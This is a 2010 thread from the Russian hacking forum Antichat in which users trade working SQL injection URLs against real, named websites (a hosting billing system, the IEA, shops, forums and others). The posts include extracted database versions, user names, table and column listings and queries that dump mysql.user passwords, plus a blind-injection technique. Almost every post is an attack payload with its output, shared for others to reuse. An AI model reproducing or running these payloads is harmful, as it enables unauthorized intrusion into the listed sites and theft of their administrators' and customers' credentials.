Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.02.2010, 20:06
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
стыдно конечно но не докрутил скулю (даже не узнал version)
если кто-нибудь докрутит скиньте мне вличку please как.
http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,42--+
|
|
|
21.02.2010, 20:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=130 78+union+select+1,2,3,4,@@version,6,7,8,9--+
джокестера заслуга бес скобок крутить то можно ...
http://fitnesslife.com.ua/myadmin/index.php
http://www.infovis.net/printMag.php?num=-141+union+select+1,2,3,4,group_concat(User,0x3a,Pa ssword),6,7,8,9,10,11,12,13+FROM+mysql.user--+&lang=2
привилегий на читалку для текущого пользователя нет, ищем пхпмайдмин 
http://www.qigong.ru/beginners/index.php?num=-3+union+select+1,concat(version(),0x3a,user(),0x3a ,database(),0x3a,@@version_compile_os),concat(conc at_ws(0x3a,User,Password,file_priv)),4+from+mysql. user+limit+1,1--+&lng=r
юзаем читалку, смотрим пхпинфо
http://www.qigong.ru/test1.php
Последний раз редактировалось Strilo4ka; 22.02.2010 в 04:22..
|
|
|
|
23.02.2010, 16:59
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Всё в открытом виде, но походу он дохлый уже давно
Код:
http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16--
5.0.89-community:dsthosti_coin1:dsthosti_admin@localhost
tables
Код:
phpcoin_admins,phpcoin_articles,phpcoin_banned,phpcoin_categories,phpcoin_clients,phpcoin_clients_contacts,phpcoin_components,phpcoin_domains,phpcoin_faq,phpcoin_faq_qa,phpcoin_helpdesk,phpcoin_helpdesk_msgs,phpcoin_icons,phpcoin_invoices,phpcoin_invoices_items,phpcoin_invoices_trans,phpcoin_mail_archive,phpcoin_mail_contacts,phpcoin_mail_queue,phpcoin_mail_templates,phpcoin_menu_blocks,phpcoin_menu_blocks_items,phpcoin_orders,phpcoin_orders_sessions,phpcoin_pages,phpcoin_parameters,phpcoin_products,phpcoin_reminders,phpcoin_server_info,phpcoin_sessions,phpcoin_site_info,phpcoin_topics,phpcoin_vendors,phpcoin_vendors_prods,phpcoin_versions,phpcoin_whois
phpcoin_domains columns
Код:
dom_id,dom_cl_id,dom_domain,dom_status,dom_type,dom_registrar,dom_ts_expiration,dom_sa_expiration,dom_si_id,dom_ip,dom_pathdom_path_temp,dom_url_cp,dom_user_name_cp,dom_user_pword_cp,dom_user_name_ftp,dom_user_pword_ftp,dom_allow_domains,dom_allow_subdomains,dom_allow_disk_space_mb,dom_allow_traffic_mb,dom_allow_mailboxes,dom_allow_databases,dom_enable_www_prefix,dom_enable_wu_scripting,dom_enable_webmail,dom_enable_frontpage,dom_enable_fromtpage_ssl,dom_enable_ssi,dom_enable_php,dom_enable_cgi,dom_enable_mod_perl,dom_enable_asp,dom_enable_ssl,dom_enable_stats,dom_enable_err_docs,dom_notes
|
|
|
|
23.02.2010, 20:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
mssql
перебирать впадляк но понятно что можно какой то софт взять но сам пробывал ...
http://www.iea.org/index_info.asp?id=854+or+1=(SELECT+TOP+1+COLUMN_NA ME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E='PASSWORD_T'+and+column_name+not+in+('ID'))--
БД:dbo,guest,INFORMATION_SCHEMA,sys,Ian,iea_read er,iea_data,Writer,Reader,db_owner...
Таблица PASSWORD_T:
'A','ACCESS_LEVEL','ADDRESS' ,'AFRICA','AIM' ,'ALUMNI','ANCHOR_NAME' ,'ARCHIVE_START' ,archiveid','ARRIVAL_DATE' ...
имя БД :
http://www.iea.org index_info.asp?id=854+or+1=(select+db_name())--+
версия:
http://www.iea.org/index_info.asp?id=854+or+1=@@version--+
Кстати здесь идеальная ошибка как писал забаненый cash --> Unclosed quotation mark after the character string
Последний раз редактировалось Strilo4ka; 23.02.2010 в 20:31..
|
|
|
|
23.02.2010, 22:23
|
|
Участник форума
Регистрация: 25.10.2008
Сообщений: 215
Провел на форуме:
2483773
Репутация:
78
|
|
Код:
http://www.cr.camcom.it/view.php?topic=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17+--+
Version: 4.1.19-max
User: cciaa
Database: cciaa |
|
|
|
24.02.2010, 04:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.kozactvo.org.ua/uk_u.php?d=a&i=-2165+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,14,15,16--+
http://www.wbdg.org/ccb/browse_doc.php?d=-5445+union+select+concat(version(),file_priv,user) ,2,3,4+from+mysql.user+where+user=0x6273615f666f72 756d--+
5.0.88-rsNbsa_forum
Последний раз редактировалось Strilo4ka; 24.02.2010 в 04:29..
|
|
|
|
24.02.2010, 12:05
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
shortcms.de
Код:
http://www.shortcms.de/printview.php?func=news1&pvid=-55%20union%20all%20select%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8--
Код:
5.0.81-log:dbo230238322@212.227.29.31:db230238322
firstsong.de
Код:
http://www.firstsong.de/kde/printview.php?func=news1&pvid=-55%20union%20select%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7--
Код:
5.0.32-Debian_7etch11-log:web9@localhost:usr_web9_1
|
|
|
|
24.02.2010, 14:15
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Какой-то порнографический(или эротический) сайт мля... Пришлось аж картинки отключать, чтобы не видеть этого!!! Blind,запарился перебирать:
Код:
http://www.squirtz.com/model.html?id=-1+union+select+1,2,3,4,0,6,ascii(substring((select+version()),1,1)),8--
version: 5.0.7
user: root@localhost
database: networkCentral
Короче смысл какой: первый столбец - id модели. Я взял первый. Там отображается возраст, 31 год для первого id-шника.
7ой столбец - это сколько отнимается от возраста. Ну и надо считать(математика ёпт).
В результате того запроса, который я написал, возраст получается -22->22+31=53(ascii ёпт)->версия 5
Последний раз редактировалось Seravin; 24.02.2010 в 15:11..
|
|
|
|
24.02.2010, 15:02
|
|
Новичок
Регистрация: 08.10.2009
Сообщений: 7
Провел на форуме:
24928
Репутация:
2
|
|
http://www.borkecast.ru/index.php?action=pages&sid=4&id=-1+Union+select+1,2,3,4,5,6,7,concat(version(),0x3a ,user(),0xa3,database()),9
5.0.51a-community:
borkecas_borkec0@localhost
borkecas_borke
|
|
|
|
24.02.2010, 16:44
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Ещё раз выложу, если удалите, хоть напишите почему!
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15+--+
5.0.45:root@localhost:viajando_
Databases:
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.schemata+--+
information_schema,mysql,test,viajando_
Tables database(mysql)
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=0x6d7973716c+--+
columns_priv,db,func,help_category,help_keyword,he lp_relation,help_topic,host,proc,procs_priv,tables _priv,time_zone,time_zone_leap_second,time_zone_na me,time_zone_transition,time_zone_transition_type, user
Tables database(viajando_)
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=0x7669616a616e646f5f+--+
afiliados,ano,areas,atracoes,atracoes_avulsas,atra coes_comentarios,cadastro,cadastro_ano,cadastro_di a,cadastro_mes,chat,cidades,clubes,codigos_seguran ca,colunas,colunas_colaboradores,compras,compras_l ista,compras_lista_categorias,curiosidades,dia,dis ney_legends,dominio,empresas,encontros_gifts,enque te,enquete_opcao,estados,eventos_sazonais,forum_di cas,forum_informacoes,forum_online,forum_topicos,f orum_topicos_favoritos,fotos,fotos_exibicao,guestb ook,hiddenmickeys,horario,hoteis,hoteis_categorias ,hoteis_comentarios,images,ips_bloqueados,links,li nksrelacionados,lojas,materias,mes,noticias,online ,online_total,palavras,paradas,parques,parques_jar dins,passaporte,patrocinio,patrocinio_clicks,patro cinio_ingresso,patrocinio_ingresso_empresas,planej amento,planejamento_secoes,quotes,quotes_meta,refe icoes_personagens,reformas,rentacar_cars,rentacar_ categories,rentacar_companies,rentacar_promotions, rentacar_tables,restaurantes,restaurantes_comentar ios,shoppings,telefones,tours,users,users_notices, videos,visitas,visto
Columns(mysql.user)
Код:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x75736572+--+
Host,User,Password,Select_priv,Insert_priv,Update_ priv,Delete_priv,Create_priv,Drop_priv,Reload_priv ,Shutdown_priv,Process_priv,File_priv,Grant_priv,R eferences_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_priv,Crea te_view_priv,Show_view_priv,Create_routine_priv,Al ter_routine_priv,Create_user_priv,ssl_type,ssl_cip her,x509_issuer,x509_subject,max_questions,max_upd ates,max_connections,max_user_connections
Последний раз редактировалось Seravin; 24.02.2010 в 17:04..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
